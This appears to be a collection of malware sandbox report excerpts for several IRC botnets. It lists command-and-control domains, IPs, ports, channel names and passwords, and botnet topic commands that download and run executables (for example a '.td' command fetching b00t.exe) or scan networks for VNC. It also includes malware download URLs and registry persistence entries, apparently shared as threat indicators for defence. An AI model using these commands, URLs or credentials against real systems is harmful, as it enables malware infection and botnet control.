scheck.sytes.net scheck.sytes.net 208.51.78.252 ferroclubchile.cl ferroclubchile.cl 200.72.160.252
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1037
Send Datagram: 55 packet(s) of size 1
Recv Datagram: 55 packet(s) of size 1
Download URLs
http://208.51.78.252/ps.exe (scheck.sytes.net)
http://200.72.160.252/img/fam//ps.exe (ferroclubchile.cl)
Outgoing connection to remote server: scheck.sytes.net TCP port 80
Outgoing connection to remote server: ferroclubchile.cl TCP port 80
DNS Lookup Host

hub.1282.net
Remote Host      Port Number
193.104.27.98    80
218.61.22.10     1863
* The data identified by the following URLs was then requested from the remote web server:
  o http://193.104.27.98/pizda.php
  o http://193.104.27.98/fox.bin
  o http://www.ip-adress.com/
MODE [N00_USA_XP_7947582]8 @ -ix
PONG eee.4088.com
JOIN #superman open
MODE #superman -ix
* The following ports were open in the system:
Port Protocol Process
1053

flex.sintoniatotal.org
* Unknown Connections
  o Host By Name:
    + Requested Host: flex.sintoniatotal.org
    + Resulting Address: 120.126.19.44
  o Connection Established: 0
  o Socket: 0
* Outgoing Connections
  o Transport Protocol: TCP
  o Remote Address: 120.126.19.44
  o Remote Port: 4545
  o Connection Established: 0
  o Socket: 1752
more here http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=12056277&cs=F7D3B935AA72AC77A9162D505FB6D5EE

h3ll.bounceme.net
Host Name            IP Address
h3ll.bounceme.net    66.11.238.23
Opened listening TCP connection on port: 34115
* C&C Server: 66.11.238.23:1993
* Server Password:
* Username: cxcds
* Nickname: L2-|7j8
* Channel: #vncshit# (Password: suckmybigdick)
* Channeltopic: :.scan 64 0 y 3 0 58.x.x.x
Outgoing connection to remote server: 58.163.0.1 TCP port 5900
Outgoing connection to remote server: 58.163.0.55

bmcash.net
# UDP Connections
  o DNS Data
    + Name Server 192.168.1.200
      # DNS Package:
        * ID: $100
        * Type: Query
        * OP Code: Query
        * Flags: RD
        * R Code: NoError
        * QD Count: 1
        * AN Count: 0
        * NS Count: 0
        * AR Count: 0
  o Question Section
    + Question:
      # Name: bmcash.net
      #

tshge.mamadody.mobi
tshge.mamadody.mobi 74.117.174.95
* C&C Server: 74.117.174.95:15656
* Server Password:
* Username: nn
* Nickname: hh[DEU|XP]5178227
* Channel: #t (Password: )
* Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s
* C&C Server: 74.117.174.95:15656
* Server Password:
* Username: nn
* Nickname: [DEU|XP]5665417
* Channel: #t (Password: )
* Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s
Registry Changes by

83.140.172.212(Worm.IM.Sohanad)
Remote Host       Port Number
64.62.181.46      80
83.140.172.212    6667
* The data identified by the following URL was then requested from the remote web server:
  o http://h1.ripway.com/sxmast/config.php
NICK u-uu6
USER l4 8 * :0.0
PONG :3083554165
JOIN #sxsouls nopass
* The following port was open in the system:
Port Protocol Process
1056 TCP usx32.exe (%AppData%usx32.exe)
Registry

tmcn.gadarlar.net
tmcn.gadarlar.net 93.190.140.115
* C&C Server: 93.190.140.115:6667
* Server Password:
* Username: tkcjkbb
* Nickname: [DEU|XP|958278]
* Channel: #infected (Password: infected)
* Channeltopic:
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Windows Services” = marqi.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run “Windows Services” = marqi.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “c:ecem.exe” = c:ecem.exe:*:Enabled:Windows Services
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework “InstallRoot”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework “CLRLoadLogDir”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework “OnlyUseLatestCLR”

69.245.107.191
69.245.107.191 (6667) channel #rb
Invisible Users: 267
Operators: 1 operator(s) online
Channels: 7 channels formed
Clients: I have 289 clients and 0 servers
Local users: Current Local Users: 289 Max: 412
Global users: Current Global Users: 289 Max: 412

us.unicatz.com
– DNS Queries:
Name              Query Type    Query Result     Successful    Protocol
us.unicatz.com    DNS_TYPE_A    66.252.13.214    1
66.252.13.214:2010
Nick: vnzznnsc
Username: vnzznnsc
Joined Channel: #us# with Password d0s